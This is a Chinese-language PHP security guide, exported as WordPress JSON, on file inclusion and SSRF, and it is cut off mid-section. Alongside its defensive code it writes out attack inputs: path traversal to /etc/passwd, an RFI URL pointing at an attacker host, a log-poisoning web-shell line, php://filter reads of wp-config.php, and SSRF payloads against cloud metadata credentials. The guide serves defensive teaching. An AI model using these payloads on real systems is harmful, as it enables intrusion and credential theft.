{"id":641,"date":"2025-12-08T19:59:05","date_gmt":"2025-12-08T11:59:05","guid":{"rendered":"https:\/\/www.52runoob.com\/?p=641"},"modified":"2025-12-08T19:59:05","modified_gmt":"2025-12-08T11:59:05","slug":"php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90","status":"publish","type":"post","link":"https:\/\/www.52runoob.com\/index.php\/2025\/12\/08\/php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90\/","title":{"rendered":"PHP\u5b89\u5168\u6f0f\u6d1e\u4e4b\u6587\u4ef6\u5305\u542b\u4e0eSSRF\u653b\u51fb\u5168\u89e3\u6790"},"content":{"rendered":"\n<p>\u4e0b\u9762\u662f\u4e00\u4efd\u9762\u5411\u5f00\u53d1\u8005\u548c\u5b89\u5168\u5de5\u7a0b\u5e08\u7684\u6df1\u5165\u6307\u5357\uff0c\u8986\u76d6&nbsp;<strong>PHP \u4e2d\u7684\u6587\u4ef6\u5305\u542b\uff08LFI\/RFI\/\u5305\u542b\u94fe\uff09\u4e0e SSRF\uff08\u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020\uff09<\/strong>\uff1a\u6982\u5ff5\u3001\u5e38\u89c1\u5229\u7528\u94fe\u3001\u68c0\u6d4b\u65b9\u6cd5\u3001\u8be6\u7ec6\u7f13\u89e3\u63aa\u65bd\u3001\u4ee3\u7801\u7ea7\u5b89\u5168\u5b9e\u8df5\u3001\u8fd0\u7ef4\/\u7f51\u7edc\u9632\u62a4\u4e0e\u590d\u73b0\/\u6d4b\u8bd5\u6280\u5de7\u3002\u613f\u8fd9\u4efd\u6307\u5357\u80fd\u5f53\u6210\u4f60\u67e5\u6f0f\u6d1e\u3001\u4fee\u6f0f\u6d1e\u4e0e\u5199\u5b89\u5168\u4ee3\u7801\u65f6\u7684\u201c\u6d3b\u624b\u518c\u201d\u3002<\/p>\n\n\n\n<p>\u6211\u628a\u5185\u5bb9\u5206\u6210\u51e0\u4e2a\u6e05\u6670\u6a21\u5757\uff1a\u6982\u5ff5\u4e0e\u5371\u5bb3\u3001\u5178\u578b\u6f0f\u6d1e\u793a\u4f8b\uff08\u6613\u88ab\u5ffd\u89c6\u7684\u53d8\u4f53\uff09\u3001\u5229\u7528\u6280\u5de7\uff08LFI\u2192RCE\u3001SSRF\u2192\u5185\u7f51\/\u5143\u6570\u636e\u6e17\u900f\u7b49\uff09\u3001\u68c0\u6d4b\/\u590d\u73b0\u65b9\u5f0f\u3001\u4ee3\u7801\u7ea7\u9632\u62a4\u4e0e\u6700\u4f73\u5b9e\u8df5\u3001\u8fd0\u7ef4\/\u7f51\u7edc\u9632\u62a
4\u3001\u68c0\u6d4b\u5de5\u5177\u4e0eCI\u96c6\u6210\u3001\u54cd\u5e94\u4e0e\u8865\u6551\u3002\u6bcf\u4e00\u8282\u90fd\u7ed9\u51fa\u53ef\u590d\u5236\u7684\u4ee3\u7801\u7247\u6bb5\u4e0e\u5177\u4f53\u914d\u7f6e\u5efa\u8bae\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e00\u3001\u57fa\u7840\u6982\u5ff5\u4e0e\u5371\u5bb3\u6982\u89c8<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u6587\u4ef6\u5305\u542b\uff08File Inclusion\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>LFI\uff08Local File Inclusion\uff09<\/strong>\uff1a\u5e94\u7528\u628a\u7528\u6237\u8f93\u5165\u7528\u4f5c\u6587\u4ef6\u8def\u5f84\u5e76\u901a\u8fc7\u00a0<code>include<\/code>\/<code>require<\/code>\u00a0\u7b49\u5728\u672c\u5730\u5305\u542b\u6267\u884c\uff0c\u653b\u51fb\u8005\u80fd\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\uff0c\u751a\u81f3\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u6267\u884c\u4ee3\u7801\uff08log poisoning\u3001phar \u534f\u8bae\u7b49\uff09\u3002<\/li>\n\n\n\n<li><strong>RFI\uff08Remote File Inclusion\uff09<\/strong>\uff1a\u5f53\u00a0<code>allow_url_include=On<\/code>\u00a0\u4e14\u672a\u8fc7\u6ee4\u7528\u6237\u8f93\u5165\u65f6\uff0c\u7528\u6237\u80fd\u7528\u8fdc\u7a0b URL\uff08http:\/\/\u2026\/shell.php\uff09\u88ab\u5305\u542b\u5e76\u6267\u884c\u2014\u2014\u6781\u5176\u5371\u9669\uff08RCE\uff09\u3002<\/li>\n\n\n\n<li>\u76f8\u5173 PHP 
\u51fd\u6570\/\u8bed\u6cd5\uff1a<code>include<\/code>,\u00a0<code>require<\/code>,\u00a0<code>include_once<\/code>,\u00a0<code>require_once<\/code>,\u00a0<code>file_get_contents<\/code>,\u00a0<code>fopen<\/code>,\u00a0<code>readfile<\/code>,\u00a0<code>file_put_contents<\/code>,\u00a0<code>fopen_streams<\/code>,\u00a0<code>stream_wrapper_register<\/code>\u00a0\u7b49\u90fd\u53ef\u88ab\u8bef\u7528\u5f15\u53d1\u95ee\u9898\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u5371\u5bb3<\/strong>\uff1a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3001\u654f\u611f\u4fe1\u606f\u6cc4\u9732\uff08\u914d\u7f6e\u3001\u79c1\u94a5\uff09\u3001\u547d\u4ee4\u6267\u884c\u3001\u6301\u4e45\u540e\u95e8\u6ce8\u5165\u3001\u6a2a\u5411\u6269\u5c55\uff08\u653b\u51fb\u5176\u4ed6\u4e3b\u673a\uff09\u7b49\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SSRF\uff08Server-Side Request Forgery\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u540e\u7aef\u670d\u52a1\u5668\u66ff\u5ba2\u6237\u7aef\u53d1\u8d77 HTTP\u3001TCP\u3001UDP \u7b49\u8bf7\u6c42\u65f6\uff0c\u5982\u679c\u76ee\u6807\u5730\u5740\u53ef\u7531\u4e0d\u53ef\u4fe1\u8f93\u5165\u63a7\u5236\uff0c\u5219\u4f1a\u53d1\u751f SSRF\u3002<\/li>\n\n\n\n<li>\u653b\u51fb\u8005\u53ef\u8bbf\u95ee\u5185\u7f51\u670d\u52a1\uff08127.0.0.1:80\uff09\u3001\u4e91\u5382\u5546\u5143\u6570\u636e\u670d\u52a1\uff08AWS 169.254.169.254\u3001GCP metadata server\uff09\u3001\u6216\u89e6\u53d1\u5bf9\u5916\u90e8\u56de\u8fde\uff08\u7528\u4e8e\u6570\u636e\u7a83\u53d6\/SSRF\u2192RCE \u94fe\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u5371\u5bb3<\/strong>\uff1a\u5185\u7f51\u7aef\u53e3\u626b\u63cf\u3001\u654f\u611f\u63a5\u53e3\u8bbf\u95ee\uff08Redis\u3001Elasticsearch\u3001Kubernetes API\uff09\u3001\u5143\u6570\u636e\u6cc4\u9732\uff08\u56de\u4f20 token\/credentials\uff09\u3001\u8fdc\u7a0b\u8bf7\u6c42\u6253\u70b9\uff08\u7528\u4e8e CSRF \u63a9\u76d6\uff09\u7b49\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 
class=\"wp-block-heading\">\u4e8c\u3001\u5178\u578b\u6f0f\u6d1e\u793a\u4f8b\u4e0e\u5229\u7528\u94fe\uff08\u5305\u542b\u7ec6\u8282\uff09<\/h1>\n\n\n\n<p>\u4e0b\u9762\u662f\u4e00\u4e9b\u5e38\u89c1\u6613\u51fa\u9519\u7684\u7247\u6bb5\u4e0e\u5982\u4f55\u88ab\u5229\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1) \u76f4\u63a5\u5305\u542b\u7528\u6237\u8f93\u5165\uff08\u5371\u9669\u793a\u4f8b\uff09<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n\/\/ BAD\n$page = $_GET&#x5B;&#039;page&#039;];\ninclude &quot;\/var\/www\/html\/pages\/$page.php&quot;;\n\n<\/pre><\/div>\n\n\n<p>\u82e5&nbsp;<code>page=..\/..\/..\/..\/etc\/passwd%00<\/code>\uff08\u5386\u53f2\u4e0a null byte\u53ef\u7ed5\u8fc7\uff09\uff0c\u6216&nbsp;<code>page=http:\/\/attacker\/shell<\/code>\uff08\u82e5 allow_url_include=On\uff09\uff0c\u5c31\u4f1a\u88ab\u5229\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2) file_get_contents \u7528\u4e8e\u8bfb\u53d6\u7528\u6237\u6307\u5b9a URL\uff08SSRF\uff09<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$url = $_GET&#x5B;&#039;url&#039;];\n$data = file_get_contents($url); \/\/ SSRF \u53ef\u63a7\n\n<\/pre><\/div>\n\n\n<p>\u82e5&nbsp;<code>url=http:\/\/169.254.169.254\/latest\/meta-data\/<\/code>\uff0c\u5373\u53ef\u6cc4\u9732\u5143\u6570\u636e\u3002\u6216\u8005\u4f7f\u7528&nbsp;<code>gopher:\/\/<\/code>&nbsp;\u53ef\u89e6\u53d1\u590d\u6742 TCP \u4ea4\u4e92\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3) log poisoning\uff08LFI \u2192 RCE\uff09<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u653b\u51fb\u6d41\u7a0b\uff1a\u5b58\u5728 LFI \u80fd\u8bfb\u53d6\u65e5\u5fd7\u5e76\u5305\u542b\u65e5\u5fd7 \u2192 \u653b\u51fb\u8005\u628a PHP \u4ee3\u7801\u6ce8\u5165\u65e5\u5fd7\uff08User-Agent\u3001Referer\u3001POST body\uff09 \u2192 \u5305\u542b\u6267\u884c \u2192 RCE\u3002<\/li>\n\n\n\n<li>\u793a\u4f8b\uff1a<code>include 
'\/var\/log\/nginx\/access.log';<\/code>\u00a0\u4f46\u82e5\u00a0<code>access.log<\/code>\u00a0\u53ef\u5199\u5e76\u5305\u542b\u00a0<code>&lt;?php system($_GET[\"cmd\"]); ?><\/code>\uff0c\u5219\u53ef\u8fdc\u7a0b\u6267\u884c\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">4) phar:\/\/ \u5229\u7528\uff08\u53cd\u5e8f\u5217\u5316\u94fe\uff09<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>include 'phar:\/\/path\/to\/file.phar';<\/code>\u00a0\u53ef\u89e6\u53d1 PHAR \u5143\u6570\u636e\u4e2d\u00a0<code>__destruct<\/code>\uff0c\u7ed3\u5408\u4e0d\u5b89\u5168\u7684\u53cd\u5e8f\u5217\u5316\u53ef\u8fbe RCE\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5) php:\/\/filter \u7ed5\u8fc7<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code>\u00a0\u53ef\u8bfb\u53d6\u6e90\u7801\u5e76 base64 \u7f16\u7801\u7ed5\u8fc7\u67d0\u4e9b\u8fc7\u6ee4\u5668\uff1a<code>include 'php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/wp-config.php';<\/code><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">6) SSRF \u5bf9\u4e91\u5143\u6570\u636e\u670d\u52a1\u7684\u653b\u51fb<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AWS v1 (IMDSv1) \u4e0e IMDSv2 \u5dee\u522b\uff1aIMDSv2 \u9700\u8981 token\u3002\u82e5\u670d\u52a1\u7aef\u4f7f\u7528 IMDSv1\uff0c\u653b\u51fb\u8005\u53ef\u901a\u8fc7 SSRF \u8bfb\u53d6\u654f\u611f credentials\u3002<\/li>\n\n\n\n<li>\u5e38\u89c1\u76ee\u6807\u5730\u5740\uff1a<code>http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/<\/code><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e09\u3001\u68c0\u6d4b\u4e0e\u590d\u73b0\uff08\u6d4b\u8bd5\u6280\u5de7\uff09<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u88ab\u52a8\u4e0e\u4e3b\u52a8\u68c0\u6d4b<\/h2>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li><strong>\u88ab\u52a8<\/strong>\uff1a\u5ba1\u8ba1\u4ee3\u7801\u8def\u5f84\uff0c\u67e5\u627e\u00a0<code>include<\/code>,\u00a0<code>require<\/code>,\u00a0<code>file_get_contents<\/code>,\u00a0<code>fopen<\/code>,\u00a0<code>curl_exec<\/code>,\u00a0<code>fsockopen<\/code>,\u00a0<code>stream_socket_client<\/code>,\u00a0<code>stream_get_contents<\/code>,\u00a0<code>socket_*<\/code>\uff0c\u5e76\u68c0\u67e5\u662f\u5426\u4f7f\u7528\u672a\u8fc7\u6ee4\u7684\u5916\u90e8\u8f93\u5165\uff08$_GET\/$_POST\/HTTP headers\uff09\u3002<\/li>\n\n\n\n<li><strong>\u4e3b\u52a8<\/strong>\uff1a\u5bf9\u5916\u90e8\u63a5\u53e3\u6ce8\u5165 payloads\uff1a\n<ul class=\"wp-block-list\">\n<li>LFI \u5217\u8868\uff1a\u00a0<code>..\/..\/..\/..\/etc\/passwd<\/code>,\u00a0<code>..\/..\/..\/..\/proc\/self\/environ<\/code>,\u00a0<code>\/var\/log\/apache2\/access.log<\/code><\/li>\n\n\n\n<li>php:\/\/filter\uff1a<code>php:\/\/filter\/convert.base64-encode\/resource=...<\/code><\/li>\n\n\n\n<li>SSRF \u5217\u8868\uff1a\u00a0<code>http:\/\/127.0.0.1:80\/<\/code>,\u00a0<code>http:\/\/169.254.169.254\/<\/code>,\u00a0<code>gopher:\/\/127.0.0.1:22\/_\u2026<\/code>,\u00a0<code>http:\/\/[::1]\/<\/code>\u00a0\u7b49<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u6d4b\u8bd5\u5de5\u5177<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Burp Suite + Repeater + Collaborator\/Interactsh\uff08\u68c0\u6d4b\u5916\u62e8\u3001DNS\uff09<\/li>\n\n\n\n<li>curl\/HTTPie + \u81ea\u5efa\u56de\u8fde\u670d\u52a1\u5668\uff08ngrok \/ httpbin \/ interactsh\uff09<\/li>\n\n\n\n<li>Nuclei \/ naabu \/ ffuf \/ sqlmap\uff08\u63d2\u4ef6\u6216\u6a21\u677f\u5e93\u91cc\u6709 LFI\/SSRF \u6a21\u677f\uff09<\/li>\n\n\n\n<li>\u68c0\u6d4b\u5185\u7f51\uff1a\u5229\u7528 DNS \u56de\u8c03\u670d\u52a1\uff08dnslog.cn\u3001interact.sh\u3001Burp Collaborator\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">SSRF \u53ef\u7528\u7684\u68c0\u6d4b payloads\uff08\u793a\u4f8b\uff09<\/h2>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li><code>http:\/\/127.0.0.1\/<\/code><\/li>\n\n\n\n<li><code>http:\/\/127.0.0.1:22\/<\/code>\uff08\u68c0\u6d4b\u7aef\u53e3\uff09<\/li>\n\n\n\n<li><code>http:\/\/169.254.169.254\/latest\/meta-data\/<\/code><\/li>\n\n\n\n<li><code>gopher:\/\/127.0.0.1:11211\/_...<\/code>\uff08memcached \u5229\u7528\uff09<\/li>\n\n\n\n<li><code>file:\/\/\/etc\/passwd<\/code>\uff08\u67d0\u4e9b\u51fd\u6570\u652f\u6301 file:\/\/\uff09<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u56db\u3001\u4ee3\u7801\u7ea7\u9632\u62a4\u4e0e\u5b89\u5168\u5b9e\u8df5\uff08\u6700\u91cd\u8981\uff09<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6838\u5fc3\u539f\u5219\uff1a<strong>\u4e0d\u8981\u628a\u539f\u59cb\u7528\u6237\u8f93\u5165\u4f20\u5165\u6587\u4ef6\u8bfb\u53d6\/\u5305\u542b\/\u7f51\u7edc\u8bf7\u6c42\u51fd\u6570<\/strong>\u3002\u603b\u662f\u4f7f\u7528\u663e\u5f0f\u767d\u540d\u5355\u3001\u6700\u5c0f\u6743\u9650\u3001\u8def\u5f84\u5f52\u4e00\u5316\u4e0e\u68c0\u67e5\u3002<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">1) \u6c38\u4e0d\u76f4\u63a5\u5305\u542b\u7528\u6237\u8f93\u5165<\/h2>\n\n\n\n<p><strong>\u574f<\/strong>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ninclude $_GET&#x5B;&#039;tpl&#039;]; \/\/ \u7edd\u5bf9\u7981\u6b62\n\n<\/pre><\/div>\n\n\n<p><strong>\u597d\uff08\u767d\u540d\u5355\u6620\u5c04\uff09<\/strong>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$pages = &#x5B;\n    &#039;home&#039; =&gt; &#039;\/var\/www\/html\/pages\/home.php&#039;,\n    &#039;about&#039; =&gt; &#039;\/var\/www\/html\/pages\/about.php&#039;,\n];\n\n$key = $_GET&#x5B;&#039;page&#039;] ?? 
&#039;home&#039;;\nif (!array_key_exists($key, $pages)) {\n    http_response_code(404); exit;\n}\ninclude $pages&#x5B;$key];\n\n<\/pre><\/div>\n\n\n<p>\u53ea\u5141\u8bb8\u9884\u5b9a\u4e49\u7684\u952e\u540d\uff0c\u4e0d\u63a5\u53d7\u4efb\u610f\u8def\u5f84\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2) \u4f7f\u7528 realpath \u4e0e\u76ee\u5f55\u68c0\u6d4b\uff08\u9632\u6b62\u76ee\u5f55\u7a7f\u8d8a\uff09<\/h2>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$base = &#039;\/var\/www\/html\/pages\/&#039;;\n$path = realpath($base . $user_input);\nif ($path === false || strpos($path, $base) !== 0) {\n    throw new Exception(&#039;Invalid path&#039;);\n}\ninclude $path;\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f\uff1a<code>realpath<\/code>&nbsp;\u4f1a\u89e3\u6790\u7b26\u53f7\u94fe\u63a5\uff1b\u4e5f\u8981\u786e\u4fdd&nbsp;<code>$base<\/code>&nbsp;\u672b\u5c3e\u5904\u7406\u4e00\u81f4\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3) \u7981\u7528\u8fdc\u7a0b\u5305\u542b<\/h2>\n\n\n\n<p>\u5728&nbsp;<code>php.ini<\/code>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nallow_url_include = Off\nallow_url_fopen = Off   ; \u82e5\u771f\u7684\u4e0d\u9700\u8981\u8fdc\u7a0b\u8bbf\u95ee\uff0c\u53ef\u5173\u6389\n\n<\/pre><\/div>\n\n\n<p><code>allow_url_include=Off<\/code>&nbsp;\u53ef\u9632\u6b62&nbsp;<code>include 'http:\/\/...'<\/code>\u3002<code>allow_url_fopen<\/code>&nbsp;\u5f71\u54cd file_get_contents \u7b49\uff1b\u82e5\u4e0d\u9700\u8981\uff0c\u5efa\u8bae\u4e5f\u5173\u95ed\uff0c\u4f46\u90e8\u5206\u5e94\u7528\u53ef\u80fd\u9700\u8981\u5f00\u542f\uff08\u9700\u8981\u8bc4\u4f30\uff09\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4) \u5bf9\u6240\u6709\u7f51\u7edc\u8bf7\u6c42\u4f7f\u7528\u767d\u540d\u5355\u4e0e\u7aef\u53e3\u68c0\u67e5\uff08SSRF\uff09<\/h2>\n\n\n\n<p>\u4e0d\u8981\u628a\u7528\u6237\u63d0\u4f9b\u7684 URL 
\u76f4\u63a5\u4f20\u7ed9&nbsp;<code>file_get_contents<\/code>&nbsp;\u6216 curl\u3002\u505a\u4e24\u5c42\u9632\u62a4\uff1a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">a) URL \u89e3\u6790\u4e0e IP \u89e3\u6790<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$u = parse_url($url);\nif (!in_array($u&#x5B;&#039;scheme&#039;], &#x5B;&#039;http&#039;,&#039;https&#039;])) { throw ...; } \/\/ \u963b\u6b62 file:\/\/ gopher:\/\/ \u7b49\n$host = $u&#x5B;&#039;host&#039;];\n$ips = dns_get_record($host, DNS_A + DNS_AAAA);\nif (empty($ips)) throw ...;\n\/\/ \u89e3\u6790\u9996\u4e2a IP\n$ip = $ips&#x5B;0]&#x5B;&#039;ip&#039;] ?? $ips&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? null;\nif (!$ip) throw ...;\n\/\/ \u5224\u65ad\u662f\u5426\u5728\u79c1\u6709\u7f51\u6bb5\nfunction is_private_ip($ip) { \/* implement RFC1918, ::1, link-local, 169.254.169.254\u7b49 *\/ }\nif (is_private_ip($ip)) throw new Exception(&#039;disallowed&#039;);\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f\uff1a\u653b\u51fb\u8005\u53ef\u901a\u8fc7 DNS rebinding \u6216\u901a\u8fc7\u77ed\u65f6\u95f4\u5207\u6362 DNS \u6307\u5411\u5185\u7f51\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002\u8fdb\u4e00\u6b65\u63a8\u8350\u4f7f\u7528<strong>\u76f4\u63a5\u7981\u6b62\u76ee\u6807\u4e3a\u79c1\u6709 IP \u7684 egress<\/strong>\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">b) \u4f7f\u7528\u4ee3\u7406\/\u7f51\u5173\u8fdb\u884c\u7edf\u4e00\u8bbf\u95ee<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8ba9\u540e\u7aef\u8bf7\u6c42\u53ea\u80fd\u901a\u8fc7\u53ef\u4fe1\u7684 HTTP \u4ee3\u7406\uff08\u5185\u90e8\u4ee3\u7406\u6267\u884c\u5916\u90e8\u8bbf\u95ee\u5e76\u505a\u4e25\u683c\u68c0\u67e5\uff09\uff0c\u5e76\u901a\u8fc7\u6b64\u4ee3\u7406\u5b9e\u73b0\u767d\u540d\u5355\u3002<\/li>\n\n\n\n<li>\u6216\u4f7f\u7528 egress firewall + proxy + allowlist\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">5) \u5bf9\u6d41\u5305\u88c5\u5668\u505a\u9650\u5236<\/h2>\n\n\n\n<p>PHP 
\u652f\u6301\u5f88\u591a\u6d41\u5305\u88c5\u5668\uff08<code>php:\/\/<\/code>,&nbsp;<code>zip:\/\/<\/code>,&nbsp;<code>phar:\/\/<\/code>,&nbsp;<code>data:\/\/<\/code>,&nbsp;<code>expect:\/\/<\/code>,&nbsp;<code>gopher:\/\/<\/code>&nbsp;\u7b49\uff09\u3002\u8bb8\u591a\u5229\u7528\u4f9d\u8d56\u4e8e\u8fd9\u4e9b\u5305\u88c5\u5668\u3002<strong>\u5c3d\u91cf\u7981\u7528\u4e0d\u9700\u8981\u7684\u5305\u88c5\u5668\u6216\u5728\u914d\u7f6e\u4e2d\u9650\u5236<\/strong>\u3002\u4f8b\u5982\u5728&nbsp;<code>allow_url_fopen<\/code>&nbsp;\u5173\u95ed\u65f6\uff0c\u4e5f\u53ef\u4ee5\u5728\u4ee3\u7801\u4e2d\u68c0\u6d4b Scheme\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">6) \u6587\u4ef6\u4e0a\u4f20\u4e0e\u6587\u4ef6\u5305\u542b\u4ea4\u4e92\uff08\u975e\u5e38\u5e38\u89c1\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0a\u4f20\u6587\u4ef6<strong>\u5b58\u653e\u5728 webroot \u4ee5\u5916<\/strong>\uff08\u5982\u00a0<code>\/var\/uploads<\/code>\uff09\uff0c\u5e76\u4e14 webserver \u5bf9\u8be5\u76ee\u5f55\u7981\u6b62\u6267\u884c PHP\u3002<\/li>\n\n\n\n<li>\u968f\u673a\u4e0d\u542b\u7528\u6237\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff08\u5982 UUID\uff09\uff0c\u4e0d\u8981\u4f7f\u7528\u7528\u6237\u539f\u6587\u4ef6\u540d\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e0a\u4f20\u6587\u4ef6\u505a\u6587\u4ef6\u7c7b\u578b\u68c0\u67e5\uff08MIME \u4e0e\u9b54\u672f\u5934\uff09\uff0c\u4f46\u4e0d\u8981\u4ec5\u4f9d\u8d56\u5ba2\u6237\u7aef MIME\u3002<\/li>\n\n\n\n<li>\u63d2\u4ef6\/\u4e3b\u9898\u6587\u4ef6\u5939\u4e0d\u53ef\u5199\u7ed9\u666e\u901a\u7528\u6237\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u793a\u4f8b\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$dst = &#039;\/var\/www\/uploads\/&#039; . bin2hex(random_bytes(16)) . &#039;.&#039; . 
$ext;\nmove_uploaded_file($_FILES&#x5B;&#039;f&#039;]&#x5B;&#039;tmp_name&#039;], $dst);\n\/\/ \u8bbe\u7f6e chmod 0644\uff0c\u4e14 nginx \u7981\u6b62\u5728\u8be5\u76ee\u5f55\u6267\u884c php\n\n<\/pre><\/div>\n\n\n<p>nginx \u914d\u7f6e\u793a\u4f8b\uff08\u7981\u6b62 PHP \u6267\u884c\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nlocation \/uploads\/ {\n    location ~ \\.php$ { return 404; }\n    # \u6216 root \u6307\u5411 uploads \u76ee\u5f55\u4e14\u6ca1\u6709 php-fpm fastcgi_pass\n}\n\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\">7) \u9632\u6b62\u65e5\u5fd7\u6ce8\u5165 \/ log poisoning<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0d\u628a\u7528\u6237\u539f\u59cb\u8f93\u5165\u5199\u8fdb\u53ef\u88ab include \u7684\u65e5\u5fd7\u6587\u4ef6\uff1b\u628a\u65e5\u5fd7\u5b58\u5728\u5b89\u5168\u4f4d\u7f6e\uff0c\u6216\u5199\u6570\u636e\u5e93\u800c\u975e web \u53ef\u8bfb\u6587\u4ef6\u3002<\/li>\n\n\n\n<li>\u7981\u6b62\u5c06\u65e5\u5fd7\u6587\u4ef6\u66b4\u9732\u5230 webroot\u3002<\/li>\n\n\n\n<li>\u5728\u5199\u5165\u65e5\u5fd7\u65f6\u5bf9\u53ef\u63a7\u8f93\u5165\u505a\u7f16\u7801\uff1a\u4e0d\u8981\u5199\u5165\u00a0<code>&lt;?php<\/code>\u00a0\u7b49\u5b57\u7b26\u4e32\uff0c\u6216\u66ff\u6362\u00a0<code>&lt;<\/code>\/<code>><\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">8) \u5bf9&nbsp;<code>unserialize()<\/code>&nbsp;\u8fdb\u884c\u9650\u5236\uff08\u4e0e\u6587\u4ef6\u5305\u542b\/SSRF \u7ec4\u5408\u5229\u7528\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53cd\u5e8f\u5217\u5316\u65f6\u6307\u5b9a\u00a0<code>allowed_classes<\/code>\uff1a<code>unserialize($data, ['allowed_classes' => false])<\/code>\u00a0\u6216\u767d\u540d\u5355\u7c7b\u3002<\/li>\n\n\n\n<li>\u907f\u514d\u76f4\u63a5\u00a0<code>unserialize()<\/code>\u00a0\u6765\u81ea\u4e0d\u53ef\u4fe1\u6765\u6e90\u7684\u6570\u636e\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">9) 
